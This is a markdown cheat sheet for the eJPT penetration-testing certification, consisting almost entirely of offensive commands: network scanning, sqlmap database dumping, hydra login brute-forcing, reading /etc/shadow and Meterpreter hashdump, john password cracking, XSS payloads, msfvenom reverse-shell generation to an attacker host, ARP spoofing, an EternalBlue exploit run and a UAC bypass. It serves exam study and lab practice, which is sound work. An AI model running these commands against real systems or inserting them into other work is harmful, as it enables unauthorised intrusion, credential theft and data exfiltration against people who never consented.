└── eJPT_CheatSheet.md


/eJPT_CheatSheet.md:
--------------------------------------------------------------------------------
  1 | #### Twiter : https://twitter.com/HunterxSatam     
  2 | 
  3 | #### linkedin : https://www.linkedin.com/in/sattam-almohsen/
  4 | 
  5 | #### Youtube : https://www.youtube.com/channel/UCLHbnIG05-F5xw6kvNt47nQ 
  6 | --------------------------------------------------------------------------------------------------
  7 | # eJPT-Cheatsheet            
  8 | This is a Cheatsheet for eJPT Exam & Course.
  9 | 
 10 | ## Nmap
 11 | ```sh
 12 | nmap -sn 10.10.10.0/24                             #Host Discover
 13 | nmap -sV -sC 10.10.10.10                           #Best choice for Scanning
 14 | nmap -A 10.10.10.10                                #Too General Scanning
 15 | nmap -p<port> --script=vuln 10.10.10.10            #Vulnerabillity Assessment
 16 | ```
 17 | ## fPing
 18 | ```sh
 19 | fping -a -g 10.10.10.0/24 2>/dev/null              #Host Discover
 20 | ``` 
 21 | ## IP Route
 22 | **Syntax**\
 23 | ip route add \<Network-range\> via \<router-IP\> dev \<interface\>
 24 | ```sh
 25 | ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0 
 26 | 
 27 | ip route        # Checking defined routes in linux
 28 | route           # Checking defined routes in linux
 29 | route print     # Checking defined routes in windows
 30 | ```
 31 | ## Networking Commands
 32 | 
 33 | **Finding for IP Address and Mac Address**
 34 | ```sh
 35 | ipconfig /all       #Windows
 36 | ifconfig            #linux 
 37 | ```
 38 | **Checking Specific Host**
 39 | ```sh
 40 | ping 10.10.10.10     #allow a user to test and verify if a destination IP Address exists 
 41 | ```
 42 | **Using to Trace the Route an IP Packet**
 43 | ```sh
 44 | tracert    google.com     #Windows 
 45 | traceroute google.com     #Linux
 46 | ```
 47 | **Checking for ARP Tables**
 48 | ```sh
 49 | arp -a               #To show ARP Tables Windows 
 50 | ip neighbour         #ARP Tables Linux
 51 | ```
 52 | **Checking for Listening Ports on a Machine**
 53 | ```sh
 54 | netstat -ano        #Windows
 55 | netstat -tlunp      #linux           
 56 | ```
 57 | 
 58 | ## Dirbuster
 59 | 
 60 | ![alt text](https://github.com/SattamInfosec/SattamInfosec/blob/main/Dirbuster.PNG)
 61 | 
 62 | 
 63 | ## Gobuster 
 64 | ```sh
 65 | gobuster dir -u http://example.com -w /usr/usr/wordlists/dirb/common.txt 
 66 | 
 67 | gobuster dir -u http://example.com -w /usr/usr/wordlists/dirb/common.txt -x php 
 68 | ```
 69 | 
 70 | 
 71 | ## Netcat
 72 | **Listening for reverse shell**
 73 | ```sh
 74 | nc -nvlp 1234
 75 | ```
 76 | **Banner Grabbing**
 77 | ```sh
 78 | nc -nv 10.10.10.10 \<port\>
 79 | ```
 80 | ## SQLMap
 81 | #### Check if injection exists
 82 | ```sh
 83 | sqlmap -r Post.req
 84 | sqlmap -u "http://10.10.10.10/file.php?id=1" -p id          #GET Method
 85 | sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin"      #POST Method
 86 | ```
 87 | #### Get database if injection Exists
 88 | ```sh
 89 | sqlmap -r login.req --dbs
 90 | sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs    #GET Method
 91 | sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method
 92 | ```
 93 | #### Get Tables in a Database
 94 | ```sh
 95 | sqlmap -r login.req -D dbname --tables 
 96 | sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables        #GET Method
 97 | sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method
 98 | ```
 99 | #### Get data in a Database tables
100 | ```sh
101 | sqlmap -r login.req -D dbname -T table_name --dump
102 | sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump      #GET Method
103 | sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump   #POST Method
104 | ```
105 | ## MYSQL
106 | 
107 | **Remotely**
108 | ```sh
109 | mysql -u <user> -p<password> -h <IP> -D <dbname>
110 | ```
111 | **Locally**
112 | ```sh
113 | mysql -u <user> -p<password>
114 | ```
115 | 
116 | ## Hydra
117 | **SSH & FTP Login Bruteforcing**
118 | ```sh
119 | hydra -L userslist -P passwordslist ftp://10.10.10.10
120 | hydra -l root -P passwordslist ssh://10.10.10.10 
121 | hydra -L userlist -p password123 ftp://10.10.10.10
122 | ```          
123 | 
124 | **HTTP POST Form**
125 | ```sh
126 | hydra http://10.10.10.10/ http-post-form "/login.php:user=^USER^&password=^PASS^:Incorrect credentials" -L usernames.txt -P passwords.txt -f -V
127 | ```
128 | 
129 | *You will know which wordlists to use when the time comes*
130 | 
131 | ## Password Cracking 
132 | 
133 | #### To extract the Users with Hashes Password form OS 
134 | ```sh
135 | hashdump                #Windows (meterpreter)
136 | 
137 | cat /etc/shadow         #Linux (Terminal) 
138 | 
139 | get /etc/shadow         #Linux (FTP Server)
140 | ```
141 | #### John
142 | ```sh
143 | john <Hash_Password-File> --wordlist=/usr/share/wordlists/rockyou.txt # To crack the password from your previous output (hashdump,shadow file )
144 | 
145 | #this is another way to crack passwords (that requires shadow file with passwd file)
146 | unshadow passwd shadow > unshadowed.txt
147 | john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
148 | ```
149 | 
150 | ## XSS
151 | ```sh
152 | <script>alert(1)</script>
153 | <ScRiPt>alert(1)</ScRiPt>
154 | <script>alert('1')</script>
155 | <ScRiPt>alert('1')</ScRiPt>
156 | <script>alert('XSS')</script>
157 | <ScRiPt>alert('XSS')</ScRiPt>
158 | ```
159 | *This is a great filter bypass cheatsheet*\
160 | https://owasp.org/www-community/xss-filter-evasion-cheatsheet
161 | 
162 | ## XSS via GET & POST Request
163 | 
164 | ![alt text](https://raw.githubusercontent.com/SattamInfosec/SattamInfosec/main/XSS%20Via%20GET%20%26%20POST.PNG)
165 | 
166 | ## msfvenom shells
167 | **JSP Java Meterpreter Reverse TCP**
168 | ```sh
169 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp #TomCat content management system 
170 | ```
171 | **EXE**
172 | ```sh
173 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe #Windows System
174 | ```
175 | **PHP**
176 | ```sh
177 | msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php\                   #PHP Web Application
178 | cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
179 | ```
180 | ## ARPSpoof
181 | ```sh
182 | echo 1 > /proc/sys/net/ipv4/ip_forward
183 | arpspoof -i <interface> -t <target> -r <host>
184 | arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36
185 | ```
186 | ## SMB Enumeration
187 | **Get shares, users, groups, password policy**
188 | ```sh
189 | smbclient -L //10.10.10.10/
190 | enum4linux -U -M -S -P -G 10.10.10.10
191 | nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 
192 | nmap -p445 --script=smb-vuln-* 10.10.10.10 
193 | ```
194 | **Access Share**
195 | ```sh
196 | smbclient //10.10.10.10/share_name
197 | ```
198 | ## FTP Enumeration
199 | ```sh
200 | nmap --script=ftp-anon 10.10.10.10 -p21 
201 | nmap -A -p21 10.10.10.10 
202 | ```
203 | 
204 | **Login to FTP Server**
205 | ```sh
206 | ftp 10.10.10.10
207 | ```
208 | ## FTP Server Commands
209 | ```sh
210 | get filename               #to Receive file
211 | put filename               #to upload file 
212 | cd /../..                  #to Change remote working directory
213 | ls /..                     #to List contents of remote directory
214 | ```
215 | ## Metasploit Freamwork
216 | ```sh
217 | msfconsole                        #To run the Freamwork
218 | search <Exploit_Module>           #Search for a specific module 
219 | show exploits                     #Aonther way to display exploits
220 | show payloads                     #display payloads
221 | use exploit/windows/smb/ms17_010_psexec        #to use exploit 
222 | show options                      #Check options and required value
223 | set <OpationName> value           #To configure an option
224 | exploit                           #Execution of exploitation
225 | ``` 
226 | ## Metasploit Meterpreter autoroute
227 | ```sh
228 | run autoroute -s 10.10.10.0/24
229 | ```
230 | ## Meterpreter
231 | ```sh
232 | ps
233 | getuid
234 | getpid
235 | getsystem
236 | search -f *.txt     #search file 
237 | download Filename /root/****               #Download From victm machine to your machine 
238 | upload   /****/exploit.exe C://Windows     #Upload from your machine to victm machine   
239 | shell               #run a standard operating system shell 
240 | sysinfo             #information about the victm Machine 
241 | background          #Switch from a Meterpreter session to the msfconsole command line 
242 | ```
243 | **CHECK UAC/Privileges**
244 | ```sh
245 | run post/windows/gather/win_privs
246 | ```
247 | **BYPASS UAC**
248 | *Background the session first*
249 | ```sh
250 | exploit/windows/local/bypassuac
251 | set session
252 | ```
253 | ## MS17-010 EternalBlue SMB Remote
254 | ```sh
255 | exploit(windows/smb/ms17_010_psexec)> set RHOST </Target-IP\>
256 | exploit(windows/smb/ms17_010_psexec)> set LHOST </Attacker-IP\>
257 | exploit(windows/smb/ms17_010_psexec)> run 
258 | ```
259 | **After PrivEsc**
260 | ```sh
261 | migrate </pid\>   
262 | hashdump          #To extract the Users with Hash Passwords 
263 | ``` 
264 | ## Windows Command Line
265 | **To search for files and Folders**
266 | ```sh
267 | dir /b/s "\*.conf\*"
268 | dir /b/s "\*.txt\*"
269 | dir /b/s "\*filename\*"
270 | cd         #it's the same as 'pwd' command in linux
271 | type       #it's the same as 'cat' command in linux
272 | systeminfo         #information about the Operating System
273 | ```
274 | 
275 | 
276 | 
277 | **Check Users**
278 | ```sh
279 | net users         #Users in windows 
280 | cat /etc/passwd   #Users in linux  
281 | ```
282 | 
283 | **List drives on the machine**
284 | ```sh
285 | fsutil fsinfo drives     #windows 
286 | lsblk -l                 #Linux
287 | ```
288 | 
289 | 
290 | 
291 | 


--------------------------------------------------------------------------------